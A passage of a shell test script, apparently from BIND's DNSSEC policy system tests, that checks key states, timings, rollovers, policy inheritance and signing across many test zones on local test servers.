${ZONE}" + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) + done + + # Below apex. + _labels="a b c ns3" + for _label in $_labels; + do + _qtypes="A NSEC" + for _qtype in $_qtypes + do + n=$((n+1)) + echo_i "check ${_label} ${_qtype} rrsig is reused correctly for zone ${ZONE} ($n)" + ret=0 + dig_with_opts "${_label}.${ZONE}" "@${SERVER}" "$_qtype" > "dig.out.$DIR.test$n" || log_error "dig ${_label}.${ZONE} ${_qtype} failed" + grep "status: NOERROR" "dig.out.$DIR.test$n" > /dev/null || log_error "mismatch status in DNS response" + grep "${ZONE}\..*IN.*RRSIG.*${_qtype}.*${ZONE}" "dig.out.$DIR.test$n" > "rrsig.out.$ZONE.$_qtype" || log_error "missing RRSIG (${_qtype}) record in response" + # If this exact RRSIG is also in the signed zone file it is not refreshed. + _rrsig=$(awk '{print $5, $6, $7, $8, $9, $10, $11, $12, $13, $14;}' < "rrsig.out.$ZONE.$_qtype") + $CHECKZONE -f raw -F text -s full -o zone.out.${ZONE}.test$n "${ZONE}" "${DIR}/${ZONE}.db.signed" > /dev/null + grep "${_rrsig}" zone.out.${ZONE}.test$n > /dev/null || log_error "RRSIG (${_qtype}) not reused in zone ${ZONE}" + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) + done + done +} + +check_rrsig_reuse + +# +# Zone: unfresh-sigs.autosign. +# +set_zone "unfresh-sigs.autosign" +set_policy "autosign" "2" "300" +set_server "ns3" "10.53.0.3" +# Key properties, timings and states same as above. + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_autosign_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify +check_rrsig_refresh + +# +# Zone: ksk-missing.autosign. +# +set_zone "ksk-missing.autosign" +set_policy "autosign" "2" "300" +set_server "ns3" "10.53.0.3" +# Key properties, timings and states same as above. +# Skip checking the private file, because it is missing. +key_set "KEY1" "PRIVATE" "no" + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +# Restore the PRIVATE variable. +key_set "KEY1" "PRIVATE" "yes" + +# +# Zone: zsk-missing.autosign. +# +set_zone "zsk-missing.autosign" +set_policy "autosign" "2" "300" +set_server "ns3" "10.53.0.3" +# Key properties, timings and states same as above. +# Skip checking the private file, because it is missing. +key_set "KEY2" "PRIVATE" "no" + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +# For the apex, we expect the SOA to be signed with the KSK because the ZSK is +# offline. Temporary treat KEY1 as a zone signing key too. +set_keyrole "KEY1" "csk" +set_zonesigning "KEY1" "yes" +set_zonesigning "KEY2" "no" +check_apex +set_keyrole "KEY1" "ksk" +set_zonesigning "KEY1" "no" +set_zonesigning "KEY2" "yes" +check_subdomain +dnssec_verify + +# Restore the PRIVATE variable. +key_set "KEY2" "PRIVATE" "yes" + +# +# Zone: zsk-retired.autosign. +# +set_zone "zsk-retired.autosign" +set_policy "autosign" "3" "300" +set_server "ns3" "10.53.0.3" +# The third key is not yet expected to be signing. +set_keyrole "KEY3" "zsk" +set_keylifetime "KEY3" "31536000" +set_keyalgorithm "KEY3" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" +set_keysigning "KEY3" "no" +set_zonesigning "KEY3" "no" +# The ZSK goal is set to HIDDEN but records stay OMNIPRESENT until the new ZSK +# is active. +set_keystate "KEY2" "GOAL" "hidden" +set_keystate "KEY2" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY2" "STATE_ZRRSIG" "omnipresent" +# A new ZSK should be introduced, so expect a key with goal OMNIPRESENT, +# the DNSKEY introduced (RUMOURED) and the signatures HIDDEN. +set_keystate "KEY3" "GOAL" "omnipresent" +set_keystate "KEY3" "STATE_DNSKEY" "rumoured" +set_keystate "KEY3" "STATE_ZRRSIG" "hidden" + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_autosign_policy + +# The old ZSK is retired. +created=$(key_get KEY2 CREATED) +set_keytime "KEY2" "RETIRED" "${created}" +set_addkeytime "KEY2" "REMOVED" "${created}" 695100 +# The new ZSK is immediately published. +created=$(key_get KEY3 CREATED) +set_keytime "KEY3" "PUBLISHED" "${created}" +# And becomes active after Ipub: +# DNSKEY TTL: 300 seconds +# zone-propagation-delay 5 minutes (300 seconds) +# publish-safety: 1 hour (3600 seconds) +# Ipub: 4200 seconds +published=$(key_get KEY3 PUBLISHED) +set_addkeytime "KEY3" "ACTIVE" "${published}" 4200 +# Lzsk: 1 year (31536000 seconds) +active=$(key_get KEY3 ACTIVE) +set_addkeytime "KEY3" "RETIRED" "${active}" 31536000 +# Iret: 695100 seconds. +retired=$(key_get KEY3 RETIRED) +set_addkeytime "KEY3" "REMOVED" "${retired}" 695100 + +check_keytimes +check_apex +check_subdomain +dnssec_verify +check_rrsig_refresh + +# +# Zone: legacy-keys.kasp. +# +set_zone "legacy-keys.kasp" +# This zone has two active keys and two old keys left in key directory, so +# expect 4 key files. +set_policy "migrate-to-dnssec-policy" "4" "1234" +set_server "ns3" "10.53.0.3" + +# Key properties. +key_clear "KEY1" +set_keyrole "KEY1" "ksk" +set_keylifetime "KEY1" "16070400" +set_keyalgorithm "KEY1" "8" "RSASHA256" "2048" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "no" + +key_clear "KEY2" +set_keyrole "KEY2" "zsk" +set_keylifetime "KEY2" "16070400" +set_keyalgorithm "KEY2" "8" "RSASHA256" "2048" +set_keysigning "KEY2" "no" +set_zonesigning "KEY2" "yes" +# KSK: DNSKEY, RRSIG (ksk) published. DS needs to wait. +# ZSK: DNSKEY, RRSIG (zsk) published. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "hidden" + +set_keystate "KEY2" "GOAL" "omnipresent" +set_keystate "KEY2" "STATE_DNSKEY" "rumoured" +set_keystate "KEY2" "STATE_ZRRSIG" "rumoured" +# Two keys only. +key_clear "KEY3" +key_clear "KEY4" + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Make sure the correct legacy keys were used (and not the removed predecessor +# keys). +n=$((n+1)) +echo_i "check correct keys were used when migrating zone ${ZONE} to dnssec-policy ($n)" +ret=0 +kskfile=$(cat ns3/legacy-keys.kasp.ksk) +basefile=$(key_get KEY1 BASEFILE) +echo_i "filename: $basefile (expect $kskfile)" +test "$DIR/$kskfile" = "$basefile" || ret=1 +zskfile=$(cat ns3/legacy-keys.kasp.zsk) +basefile=$(key_get KEY2 BASEFILE) +echo_i "filename: $basefile (expect $zskfile)" +test "$DIR/$zskfile" = "$basefile" || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# KSK times. +created=$(key_get KEY1 CREATED) +keyfile=$(key_get KEY1 BASEFILE) +grep "; Publish:" "${keyfile}.key" > published.test${n}.key1 +published=$(awk '{print $3}' < published.test${n}.key1) +set_keytime "KEY1" "PUBLISHED" "${published}" +set_keytime "KEY1" "ACTIVE" "${published}" +published=$(key_get KEY1 PUBLISHED) +# The DS can be published if the DNSKEY and RRSIG records are OMNIPRESENT. +# This happens after max-zone-ttl (1d) plus publish-safety (1h) plus +# zone-propagation-delay (300s) = 86400 + 3600 + 300 = 90300. +set_addkeytime "KEY1" "SYNCPUBLISH" "${published}" 90300 +# Key lifetime is 6 months, 315360000 seconds. +set_addkeytime "KEY1" "RETIRED" "${published}" 16070400 +# The key is removed after the retire time plus DS TTL (1d), parent +# propagation delay (1h), and retire safety (1h) = 86400 + 3600 + 3600 = 93600. +retired=$(key_get KEY1 RETIRED) +set_addkeytime "KEY1" "REMOVED" "${retired}" 93600 + +# ZSK times. +created=$(key_get KEY2 CREATED) +keyfile=$(key_get KEY2 BASEFILE) +grep "; Publish:" "${keyfile}.key" > published.test${n}.key2 +published=$(awk '{print $3}' < published.test${n}.key2) +set_keytime "KEY2" "PUBLISHED" "${published}" +set_keytime "KEY2" "ACTIVE" "${published}" +published=$(key_get KEY2 PUBLISHED) +# Key lifetime is 6 months, 315360000 seconds. +set_addkeytime "KEY2" "RETIRED" "${published}" 16070400 +# The key is removed after the retire time plus max zone ttl (1d), zone +# propagation delay (300s), retire safety (1h), and sign delay (signature +# validity minus refresh, 9d) = 86400 + 300 + 3600 + 777600 = 867900. +retired=$(key_get KEY2 RETIRED) +set_addkeytime "KEY2" "REMOVED" "${retired}" 867900 + +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# +# Test dnssec-policy inheritance. +# + +# These zones should be unsigned: +# ns2/unsigned.tld +# ns4/none.inherit.signed +# ns4/none.override.signed +# ns4/inherit.none.signed +# ns4/none.none.signed +# ns5/inherit.inherit.unsigned +# ns5/none.inherit.unsigned +# ns5/none.override.unsigned +# ns5/inherit.none.unsigned +# ns5/none.none.unsigned +key_clear "KEY1" +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +set_zone "unsigned.tld" +set_policy "none" "0" "0" +set_server "ns2" "10.53.0.2" +TSIG="" +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain + +set_zone "none.inherit.signed" +set_policy "none" "0" "0" +set_server "ns4" "10.53.0.4" +TSIG="hmac-sha1:sha1:$SHA1" +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain + +set_zone "none.override.signed" +set_policy "none" "0" "0" +set_server "ns4" "10.53.0.4" +TSIG="hmac-sha224:sha224:$SHA224" +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain + +set_zone "inherit.none.signed" +set_policy "none" "0" "0" +set_server "ns4" "10.53.0.4" +TSIG="hmac-sha256:sha256:$SHA256" +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain + +set_zone "none.none.signed" +set_policy "none" "0" "0" +set_server "ns4" "10.53.0.4" +TSIG="hmac-sha256:sha256:$SHA256" +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain + +set_zone "inherit.inherit.unsigned" +set_policy "none" "0" "0" +set_server "ns5" "10.53.0.5" +TSIG="hmac-sha1:sha1:$SHA1" +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain + +set_zone "none.inherit.unsigned" +set_policy "none" "0" "0" +set_server "ns5" "10.53.0.5" +TSIG="hmac-sha1:sha1:$SHA1" +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain + +set_zone "none.override.unsigned" +set_policy "none" "0" "0" +set_server "ns5" "10.53.0.5" +TSIG="hmac-sha224:sha224:$SHA224" +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain + +set_zone "inherit.none.unsigned" +set_policy "none" "0" "0" +set_server "ns5" "10.53.0.5" +TSIG="hmac-sha256:sha256:$SHA256" +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain + +set_zone "none.none.unsigned" +set_policy "none" "0" "0" +set_server "ns5" "10.53.0.5" +TSIG="hmac-sha256:sha256:$SHA256" +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain + +# These zones should be signed with the default policy: +# ns2/signed.tld +# ns4/override.inherit.signed +# ns4/inherit.override.signed +# ns5/override.inherit.signed +# ns5/inherit.override.signed +set_keyrole "KEY1" "csk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" + +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_ZRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "hidden" + +set_zone "signed.tld" +set_policy "default" "1" "3600" +set_server "ns2" "10.53.0.2" +TSIG="" +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_csk_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +set_zone "override.inherit.signed" +set_policy "default" "1" "3600" +set_server "ns4" "10.53.0.4" +TSIG="hmac-sha1:sha1:$SHA1" +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_csk_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +set_zone "inherit.override.signed" +set_policy "default" "1" "3600" +set_server "ns4" "10.53.0.4" +TSIG="hmac-sha224:sha224:$SHA224" +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_csk_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +set_zone "override.inherit.unsigned" +set_policy "default" "1" "3600" +set_server "ns5" "10.53.0.5" +TSIG="hmac-sha1:sha1:$SHA1" +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_csk_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +set_zone "inherit.override.unsigned" +set_policy "default" "1" "3600" +set_server "ns5" "10.53.0.5" +TSIG="hmac-sha224:sha224:$SHA224" +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_csk_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# These zones should be signed with the test policy: +# ns4/inherit.inherit.signed +# ns4/override.override.signed +# ns4/override.none.signed +# ns5/override.override.unsigned +# ns5/override.none.unsigned +# ns4/example.net (both views) +set_keyrole "KEY1" "csk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "14" "ECDSAP384SHA384" "384" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" + +set_zone "inherit.inherit.signed" +set_policy "test" "1" "3600" +set_server "ns4" "10.53.0.4" +TSIG="hmac-sha1:sha1:$SHA1" +wait_for_nsec +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_csk_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +set_zone "override.override.signed" +set_policy "test" "1" "3600" +set_server "ns4" "10.53.0.4" +TSIG="hmac-sha224:sha224:$SHA224" +wait_for_nsec +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_csk_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +set_zone "override.none.signed" +set_policy "test" "1" "3600" +set_server "ns4" "10.53.0.4" +TSIG="hmac-sha256:sha256:$SHA256" +wait_for_nsec +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_csk_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +set_zone "override.override.unsigned" +set_policy "test" "1" "3600" +set_server "ns5" "10.53.0.5" +TSIG="hmac-sha224:sha224:$SHA224" +wait_for_nsec +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_csk_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +set_zone "override.none.unsigned" +set_policy "test" "1" "3600" +set_server "ns5" "10.53.0.5" +TSIG="hmac-sha256:sha256:$SHA256" +wait_for_nsec +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_csk_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Test with views. +set_zone "example.net" +set_server "ns4" "10.53.0.4" +TSIG="$DEFAULT_HMAC:keyforview1:$VIEW1" +wait_for_nsec +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" "example1" +set_keytimes_csk_policy +check_keytimes +check_apex +dnssec_verify +# check zonestatus +n=$((n+1)) +echo_i "check $ZONE (view example1) zonestatus ($n)" +ret=0 +check_isdynamic "$SERVER" "$ZONE" "example1" || log_error "zone not dynamic" +check_inlinesigning "$SERVER" "$ZONE" "example1" && log_error "inline-signing enabled, expected disabled" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) +# check subdomain +n=$((n+1)) +echo_i "check TXT example.net (view example1) rrset is signed correctly ($n)" +ret=0 +dig_with_opts "view.${ZONE}" "@${SERVER}" TXT > "dig.out.$DIR.test$n.txt" || log_error "dig view.${ZONE} TXT failed" +grep "status: NOERROR" "dig.out.$DIR.test$n.txt" > /dev/null || log_error "mismatch status in DNS response" +grep "view.${ZONE}\..*${DEFAULT_TTL}.*IN.*TXT.*view1" "dig.out.$DIR.test$n.txt" > /dev/null || log_error "missing view.${ZONE} TXT record in response" +check_signatures TXT "dig.out.$DIR.test$n.txt" "ZSK" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +TSIG="$DEFAULT_HMAC:keyforview2:$VIEW2" +wait_for_nsec +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" "example2" +check_apex +dnssec_verify +# check zonestatus +n=$((n+1)) +echo_i "check $ZONE (view example2) zonestatus ($n)" +ret=0 +check_isdynamic "$SERVER" "$ZONE" "example2" && log_error "zone dynamic, but not expected" +check_inlinesigning "$SERVER" "$ZONE" "example2" || log_error "inline-signing disabled, expected enabled" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) +# check subdomain +n=$((n+1)) +echo_i "check TXT example.net (view example2) rrset is signed correctly ($n)" +ret=0 +dig_with_opts "view.${ZONE}" "@${SERVER}" TXT > "dig.out.$DIR.test$n.txt" || log_error "dig view.${ZONE} TXT failed" +grep "status: NOERROR" "dig.out.$DIR.test$n.txt" > /dev/null || log_error "mismatch status in DNS response" +grep "view.${ZONE}\..*${DEFAULT_TTL}.*IN.*TXT.*view2" "dig.out.$DIR.test$n.txt" > /dev/null || log_error "missing view.${ZONE} TXT record in response" +check_signatures TXT "dig.out.$DIR.test$n.txt" "ZSK" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +TSIG="$DEFAULT_HMAC:keyforview3:$VIEW3" +wait_for_nsec +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" "example3" +check_apex +dnssec_verify +# check zonestatus +n=$((n+1)) +echo_i "check $ZONE (view example3) zonestatus ($n)" +ret=0 +check_isdynamic "$SERVER" "$ZONE" "example3" && log_error "zone dynamic, but not expected" +check_inlinesigning "$SERVER" "$ZONE" "example3" || log_error "inline-signing disabled, expected enabled" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) +# check subdomain +n=$((n+1)) +echo_i "check TXT example.net (view example3) rrset is signed correctly ($n)" +ret=0 +dig_with_opts "view.${ZONE}" "@${SERVER}" TXT > "dig.out.$DIR.test$n.txt" || log_error "dig view.${ZONE} TXT failed" +grep "status: NOERROR" "dig.out.$DIR.test$n.txt" > /dev/null || log_error "mismatch status in DNS response" +grep "view.${ZONE}\..*${DEFAULT_TTL}.*IN.*TXT.*view2" "dig.out.$DIR.test$n.txt" > /dev/null || log_error "missing view.${ZONE} TXT record in response" +check_signatures TXT "dig.out.$DIR.test$n.txt" "ZSK" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Clear TSIG. +TSIG="" + +# +# Testing RFC 8901 Multi-Signer Model 2. +# +set_zone "multisigner-model2.kasp" +set_policy "multisigner-model2" "2" "3600" +set_server "ns3" "10.53.0.3" +key_clear "KEY1" +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +# Key properties. +set_keyrole "KEY1" "ksk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "no" + +set_keyrole "KEY2" "zsk" +set_keylifetime "KEY2" "0" +set_keyalgorithm "KEY2" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" +set_keysigning "KEY2" "no" +set_zonesigning "KEY2" "yes" + +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "hidden" +set_keystate "KEY2" "GOAL" "omnipresent" +set_keystate "KEY2" "STATE_DNSKEY" "rumoured" +set_keystate "KEY2" "STATE_ZRRSIG" "rumoured" + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +# Check that the ZSKs from the other provider are published. +zsks_are_published() { + dig_with_opts +short "$ZONE" "@${SERVER}" DNSKEY > "dig.out.$DIR.test$n" || return 1 + # We should have three ZSKs. + lines=$(grep "256 3 13" dig.out.$DIR.test$n | wc -l) + test "$lines" -eq 3 || return 1 + # And one KSK. + lines=$(grep "257 3 13" dig.out.$DIR.test$n | wc -l) + test "$lines" -eq 1 || return 1 +} + +n=$((n+1)) +echo_i "update zone with ZSK from another provider for zone ${ZONE} ($n)" +ret=0 +( +echo zone ${ZONE} +echo server 10.53.0.3 "$PORT" +echo update add $(cat "${DIR}/${ZONE}.zsk2") +echo send +) | $NSUPDATE +retry_quiet 10 zsks_are_published || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# Testing manual rollover. +# +set_zone "manual-rollover.kasp" +set_policy "manual-rollover" "2" "3600" +set_server "ns3" "10.53.0.3" +key_clear "KEY1" +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" +# Key properties. +set_keyrole "KEY1" "ksk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "no" + +set_keyrole "KEY2" "zsk" +set_keylifetime "KEY2" "0" +set_keyalgorithm "KEY2" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" +set_keysigning "KEY2" "no" +set_zonesigning "KEY2" "yes" +# During set up everything was set to OMNIPRESENT. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY1" "STATE_KRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_DS" "omnipresent" + +set_keystate "KEY2" "GOAL" "omnipresent" +set_keystate "KEY2" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY2" "STATE_ZRRSIG" "omnipresent" + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# The first keys were published and activated a day ago. +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "PUBLISHED" "${created}" -86400 +set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" -86400 +set_addkeytime "KEY1" "ACTIVE" "${created}" -86400 +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -86400 +set_addkeytime "KEY2" "ACTIVE" "${created}" -86400 +# Key lifetimes are unlimited, so not setting RETIRED and REMOVED. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Schedule KSK rollover in six months (15552000 seconds). +active=$(key_get KEY1 ACTIVE) +set_addkeytime "KEY1" "RETIRED" "${active}" 15552000 +retired=$(key_get KEY1 RETIRED) +rndc_rollover "$SERVER" "$DIR" $(key_get KEY1 ID) "${retired}" "$ZONE" +# Rollover starts in six months, but lifetime is set to six months plus +# prepublication duration = 15552000 + 7500 = 15559500 seconds. +set_keylifetime "KEY1" "15559500" +set_addkeytime "KEY1" "RETIRED" "${active}" 15559500 +retired=$(key_get KEY1 RETIRED) +# Retire interval of this policy is 26h (93600 seconds). +set_addkeytime "KEY1" "REMOVED" "${retired}" 93600 + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Schedule KSK rollover now. +set_policy "manual-rollover" "3" "3600" +set_keystate "KEY1" "GOAL" "hidden" +# This key was activated one day ago, so lifetime is set to 1d plus +# prepublication duration (7500 seconds) = 93900 seconds. +set_keylifetime "KEY1" "93900" +created=$(key_get KEY1 CREATED) +set_keytime "KEY1" "RETIRED" "${created}" +rndc_rollover "$SERVER" "$DIR" $(key_get KEY1 ID) "${created}" "$ZONE" +# New key is introduced. +set_keyrole "KEY3" "ksk" +set_keylifetime "KEY3" "0" +set_keyalgorithm "KEY3" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY3" "yes" +set_zonesigning "KEY3" "no" + +set_keystate "KEY3" "GOAL" "omnipresent" +set_keystate "KEY3" "STATE_DNSKEY" "rumoured" +set_keystate "KEY3" "STATE_KRRSIG" "rumoured" +set_keystate "KEY3" "STATE_DS" "hidden" + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +# Schedule ZSK rollover now. +set_policy "manual-rollover" "4" "3600" +set_keystate "KEY2" "GOAL" "hidden" +# This key was activated one day ago, so lifetime is set to 1d plus +# prepublication duration (7500 seconds) = 93900 seconds. +set_keylifetime "KEY2" "93900" +created=$(key_get KEY2 CREATED) +set_keytime "KEY2" "RETIRED" "${created}" +rndc_rollover "$SERVER" "$DIR" $(key_get KEY2 ID) "${created}" "$ZONE" +# New key is introduced. +set_keyrole "KEY4" "zsk" +set_keylifetime "KEY4" "0" +set_keyalgorithm "KEY4" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY4" "no" +set_zonesigning "KEY4" "no" # not yet, first prepublish DNSKEY. + +set_keystate "KEY4" "GOAL" "omnipresent" +set_keystate "KEY4" "STATE_DNSKEY" "rumoured" +set_keystate "KEY4" "STATE_ZRRSIG" "hidden" + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +# Try to schedule a ZSK rollover for an inactive key (should fail). +n=$((n+1)) +echo_i "check that rndc dnssec -rollover fails if key is inactive ($n)" +ret=0 +rndccmd "$SERVER" dnssec -rollover -key $(key_get KEY4 ID) "$ZONE" > rndc.dnssec.rollover.out.$ZONE.$n +grep "key is not actively signing" rndc.dnssec.rollover.out.$ZONE.$n > /dev/null || log_error "bad error message" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# Testing DNSSEC introduction. +# + +# +# Zone: step1.enable-dnssec.autosign. +# +set_zone "step1.enable-dnssec.autosign" +set_policy "enable-dnssec" "1" "300" +set_server "ns3" "10.53.0.3" +# Key properties. +key_clear "KEY1" +set_keyrole "KEY1" "csk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" +# The DNSKEY and signatures are introduced first, the DS remains hidden. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_ZRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "hidden" +# This policy lists only one key (CSK). +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The first key is immediately published and activated. +created=$(key_get KEY1 CREATED) +set_keytime "KEY1" "PUBLISHED" "${created}" +set_keytime "KEY1" "ACTIVE" "${created}" +# - The DS can be published if the DNSKEY and RRSIG records are +# OMNIPRESENT. This happens after max-zone-ttl (12h) plus +# publish-safety (5m) plus zone-propagation-delay (5m) = +# 43200 + 300 + 300 = 43800. +set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" 43800 +# - Key lifetime is unlimited, so not setting RETIRED and REMOVED. + +# Various signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +_check_next_key_event() { + _expect=$1 + + grep "zone ${ZONE}.*: next key event in .* seconds" "${DIR}/named.run" > "keyevent.out.$ZONE.test$n" || return 1 + + # Get the latest next key event. + if [ "${DYNAMIC}" = "yes" ]; then + _time=$(awk '{print $9}' < "keyevent.out.$ZONE.test$n" | tail -1) + else + # inline-signing zone adds "(signed)" + _time=$(awk '{print $10}' < "keyevent.out.$ZONE.test$n" | tail -1) + fi + + # The next key event time must within threshold of the + # expected time. + _expectmin=$((_expect-next_key_event_threshold)) + _expectmax=$((_expect+next_key_event_threshold)) + + test $_expectmin -le "$_time" || return 1 + test $_expectmax -ge "$_time" || return 1 + + return 0 +} + +check_next_key_event() { + n=$((n+1)) + echo_i "check next key event for zone ${ZONE} ($n)" + ret=0 + + retry_quiet 3 _check_next_key_event $1 || log_error "bad next key event time for zone ${ZONE} (expect ${_expect})" + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) + +} + +# Next key event is when the DNSKEY RRset becomes OMNIPRESENT: DNSKEY TTL plus +# publish safety plus the zone propagation delay: 900 seconds. +check_next_key_event 900 + +# +# Zone: step2.enable-dnssec.autosign. +# +set_zone "step2.enable-dnssec.autosign" +set_policy "enable-dnssec" "1" "300" +set_server "ns3" "10.53.0.3" +# The DNSKEY is omnipresent, but the zone signatures not yet. +# Thus, the DS remains hidden. +set_keystate "KEY1" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY1" "STATE_KRRSIG" "omnipresent" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The key was published and activated 900 seconds ago (with settime). +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "PUBLISHED" "${created}" -900 +set_addkeytime "KEY1" "ACTIVE" "${created}" -900 +set_addkeytime "KEY1" 